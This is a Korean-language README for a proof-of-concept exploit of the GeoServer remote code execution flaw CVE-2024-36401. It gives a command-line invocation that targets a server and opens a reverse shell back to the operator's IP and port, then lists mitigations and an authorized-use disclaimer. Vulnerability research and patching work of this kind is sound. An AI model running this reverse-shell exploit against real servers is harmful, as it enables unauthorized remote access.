
CVE-2024-36401에 대한 PoC입니다. 이 PoC는 취약한 대상에서 리버스 셸을 설정하려고 시도합니다.
CVE-2024-36401 GeoServer에 대한 POC입니다. 이 POC는 대상으로부터 역방향 시스템 셸을 설정하려고 시도합니다.

CVE-2024-36401에 대한 POC: GeoServer 2.25.1, 2.24.3 및 2.23.5 이전 버전의 GeoServer에 대한 RCE입니다. 이 POC는 phith0n의 보안 권고를 기반으로 합니다.
이 POC는 취약한 대상으로부터 역방향 셸을 설정하려고 시도합니다. 이는 취약한 Linux 대상을 대상으로 합니다. 이 POC를 실행하려면 공개 및 접근 가능한 IP를 가진 시스템이 필요합니다.
requests 라이브러리단일 대상에 대해 이 POC를 사용하려면:
python CVE-2024-36401.py -u HTTP://TARGET:9090 -ip YOUR-IP -port LOCAL-PORT-NUMBER -type GeoServer-Object-Type
도움말:
python3 CVE-2024-36401.py -h
options:
-h, --help show this help message and exit
-u U Target, example https://target:8080
-ip IP Your IP, example 192.168.1.1
-port PORT Port, example 1337
-type TYPE Type, example sf:archsites
1- WFS 요청을 비활성화하세요.
2- iptables를 구성하여 역방향 연결을 비활성화하고, 기본 정책을 모든 트래픽 차단으로 설정하고, 설정된 연결 및 관련 연결을 허용하고, DNS, HTTP, HTTPS와 같은 필수 아웃바운드 트래픽만 허용하여 Linux를 보호하세요.
3- 또는 최신 버전의 GeoServer로 업그레이드하세요.
제안 사항이나 의견이 있으시면 저에게 연락해 주세요.
저는 재미, 업무 및 교육 목적으로만 도구를 만드는 것을 좋아합니다. 저는 어떤 시스템이나 네트워크에 대한 해킹이나 무단 액세스를 지원하거나 장려하지 않습니다. 제 도구를 책임감 있게 사용하고, 명확한 테스트 권한이 있는 시스템에서만 사용하십시오.